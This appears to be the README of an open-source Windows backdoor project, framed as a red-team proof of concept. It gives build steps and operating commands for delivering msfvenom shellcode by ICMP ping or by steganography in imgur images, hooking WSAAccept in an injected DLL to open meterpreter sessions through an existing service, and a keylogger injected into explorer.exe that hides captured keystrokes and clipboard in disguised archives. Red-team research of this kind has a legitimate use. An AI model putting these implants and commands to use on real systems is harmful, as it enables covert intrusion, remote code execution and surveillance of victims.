This is a backdoor project for windows operating systems.
This is a proof-of-concept stealthy backdoor aimed to aid red teams in maintaining control of their targets during the security evaluation process. The project also intends to expose ways to abuse standard features.
Extremely stealthy backdoor for Windows platform.
git clone https://github.com/rokups/virtual-reality. Now you have two folders next to each other:
mkdir cmake-build; cd cmake-build.
cmake -DCMAKE_BUILD_TYPE=MinSizeRel ../virtual-reality.
cmake --build . --config MinSizeRel. Note that VC-LTL does not support debug builds. Do not build
Debugconfiguration or ensure that
_DEBUGpreprocessor symbol is undefined.
VC-LTL is used for linking to
msvcrt.dll and greatly reducing executable sizes.
MinGW builds are deprecated. They may work or may be broken. Reason for this is that executables built with MinGW crash when used in some injection techniques. I did not care enough to figure it out.
config.h to suit your needs.
vr.py to interact with the backdoor.
vr.py shellcode path/to/shellcode.bin reads shellcode into the script's memory.
On its own this is useless therefore combine it with other commands. You may
- instead of path in order to read shellcode from
msfvenom <...> | vr.py shellcode - -- ping 192.168.0.1 reads a shellcode from
stdin and sends it via icmp-ping to
192.168.0.1. Backdoor running on that
machine will execute this shellcode.
The shellcode will be delivered to the target by sending it as ICMP-PING packet payload.
Content of the packet appears to be random. The only give-away that something is up is a rather big packet size, although it is possible to customized packet size using ping utility or specify custom payload (Linux).
msfvenom <...> | vr.py shellcode - -- png path/to/image.png reads a shellcode
stdin and encodes into specified
image.png. This image must exist and
it must be in RGB format (no alpha). Resulting image should be uploaded to
https://imgur.com/ and tagged with one or more tags while one of the tags must be
one that is specified in
The shellcode will be encoded into a specified image by altering the last two bits of each color component in the target image. 1 byte needs 4 color components to be encoded and thus requires 1.(3) pixels. Encoded images are indistinguishable from original to the naked eye. Backdoor queries imgur API for listing images tagged with a configured tag. Every new image is downloaded and inspected for encoded payload.
Left - original image. Right - image with the encoded payload. Bottom - difference mask. 120x75 image was used. As you can see only a tiny portion of the pretty small image is used to encode 449 bytes payload.
This is a technique meant to backdoor a machine that:
gts.dll payload is meant to be injected to process of service that listens on public
interface. This payload hooks
WSAAccept() function and allows creating meterpreter
session through the listening socket of already existing service while still allowing
normal traffic to flow as if nothing has happened.
When new connection is being made payload does the following:
tcp_knockcommand and if found - whitelist command sender and terminate the connection.
WSADuplicateSocket()newly connected socket into the newly created process.
WSAECONNRESETerror to the host process.
tcp_knockis received - hand connection back to the host.
gts.dllinto process that accepts connections.
vr.py tcp_knock target_ip_address service_port
LPORT=service_portwithin 30 seconds since sending
Keylogger module works by injecting a dll to a process that runs in user's session.
It is injected into explorer.exe by default. Only one injection per user session will
be active. Keylogger monitors user's keystrokes and clipboard and writes contents into
N is a number (starting from 0). This file is a zip archive with first two bytes
zeroed out. In order to access logs user should download a file and restore first two
bytes which are
PK. Removing file will cause keylogger to create a new archive next
time any logs are available. Keylogger thread exits and frees it's memory if main
Payload is always obfuscated using the RC4 algorithm. As you probably have guessed replay attacks are a thing against this backdoor. Also, backdoor may be controlled by a rival blue team if they have reverse-engineered sample and recovered RC4 key. Utmost security is not the point of this project. If the blue team is on to the backdoor - nothing will save it anyway.
Q: Why this name? This has nothing to do with virtual reality.
A: Nothing at all. And no reason really. Naming is hard.